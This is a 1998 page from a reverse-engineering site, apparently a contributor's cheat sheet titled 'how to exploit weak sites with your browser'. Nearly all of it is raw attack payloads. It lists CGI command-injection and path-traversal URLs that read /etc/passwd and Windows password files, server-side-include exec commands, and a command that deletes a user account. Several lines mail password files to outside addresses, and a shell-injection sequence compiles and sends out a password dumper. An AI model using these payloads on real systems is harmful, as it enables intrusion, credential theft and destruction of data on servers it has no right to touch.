courtesy of fravia+'s page of reverse engineering
12 November 1998
Well, this is an interesting addition... only for real reversers, though; beginners, please go study some elementary site busting first... for all the other ones... I don't think I need to explain to you how interesting this stuff is... Enjoy! :-)
hi fravia+, this is my collection of "how to exploit weak sites with your browser". I'm working on a document which includes very new exploits... I'll let you know when it is ready... haveaniceday RUDICARELL

# test cgi's
/cgi-bin/test-cgi?\whatever
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/test-cgi?x *
/cgi-bin/nph-test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?x *

# jj
/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls

# betterones
/cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com </etc/passwd)
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?%0a blablabla &Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... etc.
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|echo;echo|

# other stuff
/dir/doit.phtml?/home/ftp/incoming/executemycode.phtml
/cgi-bin/AnyForm2? ...???
/cgi-bin/infogate? ...???
/cgi-bin/test.bat?&dir .... netscape server
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape server

# microfuck
/guti.asp::$DATA asp ......
/global.asa asp ......

# long filenames :)
/somewhere/VERYLON~.HTM .... user save verylongyy.htm file

# quid pro quo server
/site.name/server%20logfile .... quid pro quo - server

# basic auth and others
/cgi-bin/www-sql/protected_directory/irgendwas.html
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cool-logs/mlog.html?screen=/etc/passwd
/cool-logs/mylog.html?screen=/etc/passwd
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/webgais
Content-length: (length of the exploit)
query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph

# sgi silicon graphics
/cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! tabs only!)
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!)
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! old version)
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo

# frontpage extensions
www.domain.com/beliebiges_directory/_vti_cnf = directory
www.domain.com/_vti_pvt = world writeable

# old but still working IIS perl.exe
nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');"

# example for bad perl oa
;xterm -display my.ip.address:0 &
john;echo "#include \"pwd.h\"">/tmp/shadow.c
john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c
john;echo "printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c
john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c
john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c
john;cc -o /tmp/shadow /tmp/shadow.c
john;/tmp/shadow>>/tmp/passwd
john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com
john;rm /tmp/shadow*;rm /tmp/passwd

# sometimes it's really bad
~root
~root/etc/passwd (for example)

altavista .... url:etc AND link:passwd ... or ... root: 0:0
url:.htaccess .. or .. url:.htpasswd

# NCSA files
httpd.conf configure the httpd service
srm.conf scripts and documents reside
access.conf service features for all browsers
.htaccess Limits access on a directory-by-directory basis
http .... bla bla /.htaccess (NCSA .........)

# microfuck
http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time
test.bat+%26dir+%26time+%26pfieffer.exe

# novell
http ... bla bla .. /files.pl? ../../blabla
http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume

# MAC WEBSTAR
http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N

# lotus domino server (this is really cool)
http ... /domcfg.nsf/?open
http ... /domcfg.nsf/URLRedirect/?OpenForm
http:... /database.nsf/viewname?SearchView&Query="*"

# nt carbo server ****
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

# example for server side includes anon-ftp upload ****
<!--#exec cmd="/bin/ls"-->
<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->
<!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="find / -name foobar -print"-->
<!--#include file="schweinenasenfile" -->

# metaweb servers
http://mail.server.com:5000/../smusers.txt
http://mail.server.com:5000/../../winnt/repair/sam._
http://mail.server.com:5000/../../winnt/system32/net.exe?
http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete
port:2040 = javaconfig
port:5000 = mail
port:5001 = -"-
http://www.metainfo.com/products/sendmail/users.htm
http://www.metainfo.com/products/metaip/users.htm

# verity search software ******
s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt)
search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books

# uaaa |-) zhhhh
wwwboard.html
/wwwboard/passwd.txt ****
wwwadmin.pl or wwwadmin.cgi

# hylafax cgi ***
/cgi-bin/faxsurvey?/bin/ls%20-a

# other microfuck
uploader.exe/

# new lotus-domino
http://www.server.com/database.nsf/viewname?SearchView&Query="*"

/*end*/